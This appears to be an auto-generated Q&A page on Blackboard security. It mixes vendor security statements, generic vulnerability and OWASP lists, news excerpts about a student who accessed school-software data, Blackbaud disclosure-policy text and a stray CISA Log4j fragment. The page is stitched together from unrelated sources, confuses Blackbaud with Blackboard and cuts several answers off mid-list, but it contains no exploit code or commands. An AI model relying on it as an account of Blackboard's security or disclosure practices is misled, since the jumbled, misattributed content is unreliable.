blackboard vulnerability

by Heather Lockman V 9 min read

Is Blackboard secure?

Blackboard follows a secure-by-default policy with Release Notes and Documentation leveraged when special System Administrator consideration is required. Blackboard encourages customers to follow its Secure Configuration best practices guide when one is available and relevant to your specific Blackboard product.

Is Blackboard encrypted?

​Encryption at rest is available and enabled by default for all new Blackboard Learn SaaS environments. Environments created prior to release version 3200.10.

What are the 4 main types of security vulnerability?

Security Vulnerability TypesNetwork Vulnerabilities. These are issues with a network's hardware or software that expose it to possible intrusion by an outside party. ... Operating System Vulnerabilities. ... Human Vulnerabilities. ... Process Vulnerabilities.

What is the most common security vulnerability?

The most common software security vulnerabilities include:Missing data encryption.OS command injection.SQL injection.Buffer overflow.Missing authentication for critical function.Missing authorization.Unrestricted upload of dangerous file types.Reliance on untrusted inputs in a security decision.More items...

What can be tracked in Blackboard?

Blackboard can monitor and record candidates' exam environment through their computer's webcam and microphone, record computer screen, monitor and restrict right-clicking, minimize, screen capture, new window, and various other actions.Mar 30, 2022

Does Blackboard have two factor authentication?

Two-step verification and secure single sign-on with SAASPASS will help keep your firm's Blackboard access secure.

What are Owasp top 10 vulnerabilities?

OWASP Top 10 VulnerabilitiesInjection. Injection occurs when an attacker exploits insecure code to insert (or inject) their own code into a program. ... Broken Authentication. ... Sensitive Data Exposure. ... XML External Entities. ... Broken Access Control. ... Security Misconfiguration. ... Cross-Site Scripting. ... Insecure Deserialization.More items...

Which of the following are examples of vulnerabilities?

Other examples of vulnerability include these:A weakness in a firewall that lets hackers get into a computer network.Unlocked doors at businesses, and/or.Lack of security cameras.Jan 12, 2022

What are vulnerabilities and their types?

In that list, they categorize three main types of security vulnerabilities based their more extrinsic weaknesses: Porous defenses. Risky resource management. Insecure interaction between components.Aug 28, 2019

What are the Owasp Top 10 vulnerabilities for 2020?

OWASP Top 10 Web Application Security Risks and Vulnerabilities to Watch Out for in 2020Injection.Broken Authentication.Sensitive Data Exposure.XML External Entities (XXE)Broken Access Control.Security Misconfiguration.Cross-Site Scripting (XSS)Insecure Deserialization.More items...

What are three types of software vulnerabilities?

List of Software Security Vulnerabilities and WeaknessesBugs.Exposure of sensitive data.Flaws in Injection.Buffer overflow.Security misconfiguration.Broken access control.Insecure deserialization.Broken/Missing Authentication.

Can you give me an example of common security vulnerabilities?

What are the most common security threats? The top 10 internet security threats are injection and authentication flaws, XSS, insecure direct object references, security misconfiguration, sensitive data exposure, a lack of function-level authorization, CSRF, insecure components, and unfiltered redirects.

About Blackboard

Blackboard is a leading EdTech company, serving higher education, K-12, business and government clients around the world. We connect a deep understanding of education with the power of technology to continuously push the boundaries of learning.

Vulnerability Disclosure Policy

Blackboard's vulnerability management program is governed by this public-facing Vulnerability Management Commitment and Disclosure Policy below. No software vendor is perfect - in the event a security vulnerability is identified in a released product, Blackboard's Security Team is ready to respond.

What are the bugs in Blackboard?

For Blackboard, those bugs ultimately allowed access to a database that contained 24 categories of data, everything from phone numbers to discipline records, bus routes, and attendance records —though not every school seemed to store data in every field. Only 34,000 of the records included immunization history, for instance. More than 5,000 schools appeared to be included in the data, with roughly 5 million individual records in total, including students, teachers, and other staff.

What law forbids unauthorized access to a company's network?

By the time Demirkapi had gained that level of access to Follett's software, however, he was two years into his hacking escapades and slightly better informed about legal dangers like the Computer Fraud and Abuse Act, which forbids gaining unauthorized access to a company's network.

What is Follett's bug?

Among Follett's bugs, he found that could add a "group resource" to his school's account, a file that would be available to all users and, more importantly for Demirkapi, that would trigger a push notification with the resource's name to everyone in his school district who had Follett's Aspen app installed.

Did Demirkapi sue Blackboard?

With Blackboard, whose sensitive data he had accessed in the process of testing the software's security, he worked out a contract that stated the company wouldn't sue him , and in return he'd keep the company's vulnerabilities secret until they were fixed—after refusing an initial draft in which Blackboard tried to prevent him from telling anyone even after the patches went through.

Does Blackbaud work with security researchers?

Provide Blackbaud reasonable time to fix any reported issue, before such information is shared with a third party or disclosed publicly. Blackbaud will work with the security researcher and indicate approval for sharing publicly.

Does Blackbaud have legal rights?

Blackbaud reserves all legal rights in the event of noncomp liance with these guidelines. Once a report is submitted, Blackbaud commits to provide prompt acknowledgement of receipt of all reports and will keep you reasonably informed of the status of any validated vulnerability that you report through this program.

Summary

Note: CISA will continue to update this webpage as well as our community-sourced GitHub repository as we have further guidance to impart and additional vendor information to provide.

Technical Details

The CVE-2021-44228 RCE vulnerability—affecting Apache’s Log4j library, versions 2.0-beta9 to 2.14.1—exists in the action the Java Naming and Directory Interface (JNDI) takes to resolve variables.

Resources

This information is provided “as-is” for informational purposes only. CISA does not endorse any company, product, or service referenced below.

image